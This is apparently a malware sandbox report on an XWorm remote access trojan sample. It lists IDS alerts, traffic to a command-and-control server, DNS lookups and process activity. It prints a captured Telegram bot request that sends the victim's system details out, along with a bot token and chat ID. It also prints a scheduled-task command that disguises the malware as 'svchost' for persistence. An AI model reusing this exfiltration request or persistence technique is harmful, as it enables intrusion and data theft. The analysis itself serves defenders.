2024-11-23T21:08:35.150293+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
                                                2024-11-23T21:08:37.728440+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:37.730791+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:42.957033+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:42.958984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:43.203569+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:43.325613+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:48.144468+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:48.149101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:53.227048+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:53.229056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:57.895371+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:57.984436+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:58.227147+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:58.231872+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:09:04.665319+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:04.667440+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:09:05.094644+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:05.094644+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:06.781238+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:06.782274+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:09:19.091410+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:19.092806+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 23, 2024 21:07:55.599739075 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.681655884 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.719927073 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.720041990 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.839534044 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.962842941 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.964678049 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:56.085235119 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:03.766635895 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:03.912961006 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:04.155869007 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:04.165771961 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:04.286663055 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:05.095467091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:05.139522076 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.312210083 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.432300091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.432358027 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.554282904 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.554339886 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.675479889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.680387020 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.717612982 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.729947090 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.854443073 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.893836975 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.899210930 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.064845085 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:07.064908981 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.376030922 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.419467926 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:07.419586897 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.496232033 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:07.596801996 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:16.718555927 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:16.881069899 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:17.083525896 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:17.086071968 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:17.255260944 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.186995983 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:27.480506897 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.610685110 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:27.724237919 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.730190992 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.730953932 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:27.850725889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.973037004 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.975903034 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:28.098886967 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:28.381328106 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:28.501120090 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:28.743923903 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:28.746439934 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:28.878722906 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:35.150293112 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:35.202054977 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:37.361479998 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:37.482907057 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:37.728440046 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:37.730791092 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:37.852983952 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.593313932 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:42.714163065 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.714314938 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:42.834227085 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.957032919 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.958983898 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:43.086577892 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:43.167869091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:43.203568935 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:43.325335026 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:43.325613022 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:43.445072889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:47.780561924 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:47.901140928 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:48.144468069 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:48.149101019 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:48.272279978 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:52.827641964 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:52.947546959 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:53.227047920 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:53.229055882 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:53.348989964 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.532789946 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:57.652384996 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.859863997 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:57.895370960 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.936532021 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:57.984184027 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.984436035 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:58.109973907 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:58.227147102 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:58.231872082 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:58.351387024 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:04.280719995 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:04.422152042 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:04.665318966 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:04.667439938 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:04.789544106 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:05.094644070 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:05.139681101 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:06.405713081 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:06.532107115 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:06.781238079 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:06.782274008 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:06.902178049 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:18.686984062 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:18.811279058 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:19.091409922 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:19.092806101 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:19.212465048 CET133749732104.198.168.179192.168.2.4
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 23, 2024 21:05:04.352222919 CET | 62545 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 23, 2024 21:05:04.495640039 CET | 53 | 62545 | 1.1.1.1 | 192.168.2.4
                                                Nov 23, 2024 21:05:07.277539015 CET | 50483 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 23, 2024 21:05:07.422281981 CET | 53 | 50483 | 1.1.1.1 | 192.168.2.4
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Nov 23, 2024 21:05:04.352222919 CET | 192.168.2.4 | 1.1.1.1 | 0x5e9f | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                Nov 23, 2024 21:05:07.277539015 CET | 192.168.2.4 | 1.1.1.1 | 0xaf94 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Nov 23, 2024 21:05:04.495640039 CET | 1.1.1.1 | 192.168.2.4 | 0x5e9f | No error (0) | ip-api.com | (none) | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                Nov 23, 2024 21:05:07.422281981 CET | 1.1.1.1 | 192.168.2.4 | 0xaf94 | No error (0) | api.telegram.org | (none) | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                • api.telegram.org
                                                • ip-api.com
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 6880 | C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 23, 2024 21:05:04.624641895 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                Nov 23, 2024 21:05:05.768939972 CET | 175 | IN | HTTP/1.1 200 OK
                                                Date: Sat, 23 Nov 2024 20:05:05 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | 6880 | C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-11-23 20:05:08 UTC | 429 | OUT | GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-11-23 20:05:09 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Sat, 23 Nov 2024 20:05:09 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-11-23 20:05:09 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Target ID: 0
                                                Start time: 15:04:59
                                                Start date: 23/11/2024
                                                Path: C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                Wow64 process (32bit): false
                                                Commandline: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe"
                                                Imagebase: 0xc00000
                                                File size: 85'504 bytes
                                                MD5 hash: F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation: low
                                                Has exited: false

                                                Target ID: 1
                                                Start time: 15:05:05
                                                Start date: 23/11/2024
                                                Path: C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit): false
                                                Commandline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                Imagebase: 0x7ff76f990000
                                                File size: 235'008 bytes
                                                MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: high
                                                Has exited: true

                                                Target ID: 2
                                                Start time: 15:05:05
                                                Start date: 23/11/2024
                                                Path: C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit): false
                                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase: 0x7ff7699e0000
                                                File size: 862'208 bytes
                                                MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: high
                                                Has exited: true

                                                Target ID: 3
                                                Start time: 15:05:06
                                                Start date: 23/11/2024
                                                Path: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit): false
                                                Commandline: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase: 0x240000
                                                File size: 85'504 bytes
                                                MD5 hash: F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 76%, ReversingLabs
                                                Reputation: low
                                                Has exited: true

                                                Target ID: 5
                                                Start time: 15:05:18
                                                Start date: 23/11/2024
                                                Path: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit): false
                                                Commandline: "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                Imagebase: 0x3a0000
                                                File size: 85'504 bytes
                                                MD5 hash: F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges: false
                                                Has administrator privileges: false
                                                Programmed in: C, C++ or other language
                                                Reputation: low
                                                Has exited: true

                                                Target ID: 8
                                                Start time: 15:05:26
                                                Start date: 23/11/2024
                                                Path: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit): false
                                                Commandline: "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                Imagebase: 0xa40000
                                                File size: 85'504 bytes
                                                MD5 hash: F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges: false
                                                Has administrator privileges: false
                                                Programmed in: C, C++ or other language
                                                Reputation: low
                                                Has exited: true

                                                Target ID: 9
                                                Start time: 15:06:01
                                                Start date: 23/11/2024
                                                Path: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit): false
                                                Commandline: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase: 0xa0000
                                                File size: 85'504 bytes
                                                MD5 hash: F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: low
                                                Has exited: true

                                                Target ID: 11
                                                Start time: 15:07:01
                                                Start date: 23/11/2024
                                                Path: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit): false
                                                Commandline: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase: 0xa20000
                                                File size: 85'504 bytes
                                                MD5 hash: F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: low
                                                Has exited: true

                                                Target ID:12
                                                Start time:15:08:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0x60000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:13
                                                Start time:15:09:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0xc70000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:20.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:33.3%
                                                  Total number of Nodes:9
                                                  Total number of Limit Nodes:0

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 06ca8d5beb31e5e9f902505b823cf4ac73a72730db64c2ef83f1af88ec89fe84
                                                  • Instruction ID: 7ab082676354088451b8238080946ca3402f52e1389b92c30acebc47419cac19
                                                  • Opcode Fuzzy Hash: 06ca8d5beb31e5e9f902505b823cf4ac73a72730db64c2ef83f1af88ec89fe84
                                                  • Instruction Fuzzy Hash: F9727520F2D91E4BEBA8FB788465A7973D2EF98344F554979D01EC32D6DD28E8028B41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 304 7ffd9b8b7be1-7ffd9b8b7c9d CheckRemoteDebuggerPresent 308 7ffd9b8b7ca5-7ffd9b8b7ce8 304->308 309 7ffd9b8b7c9f 304->309 309->308
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: a98fe62331017f7159e9a95bb198a6f5c73f3473aa90c6bc27307d6a4a3abd72
                                                  • Instruction ID: a2bcb3c1f48289cf63f9b9e70ce6d439811a581d838aa403f00363f06b63ae6b
                                                  • Opcode Fuzzy Hash: a98fe62331017f7159e9a95bb198a6f5c73f3473aa90c6bc27307d6a4a3abd72
                                                  • Instruction Fuzzy Hash: 4131E23190875C8FCB58DF58C84A6E97BE0EF65321F0542ABD489D7292DB34A846CB91

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eca122cae10bd49c6c73a9d69bcd17f4bb1ef8ebf9fc9bce249b62ff6fbde38d
                                                  • Instruction ID: 16e79e1ba4a02c338d70e55447a893283a8c4a6cab86535c5522494b0525c7eb
                                                  • Opcode Fuzzy Hash: eca122cae10bd49c6c73a9d69bcd17f4bb1ef8ebf9fc9bce249b62ff6fbde38d
                                                  • Instruction Fuzzy Hash: 5452B621F29A594FE758FB7C9879679B6D2FF9C300F4405B9E05DC32D6DE28A8018781

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7407ad11bf2571e0a165fac4b89396cdffb3d491e8c39d604f05072e2c7b4127
                                                  • Instruction ID: 8e0b1ec8e0b867d095c7371c3042a9b8aaf9b6ae40353f801e09f8123fe764b8
                                                  • Opcode Fuzzy Hash: 7407ad11bf2571e0a165fac4b89396cdffb3d491e8c39d604f05072e2c7b4127
                                                  • Instruction Fuzzy Hash: BEF1C470A09A4D8FEBA8DF28C855BE977D1FF58310F04426EE84DC72A5DB34D9458B82

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6a3b732ba7bf305f0fc1f053bc3b53d28f659eb2b9113bfa448bd35a5c1ed3a
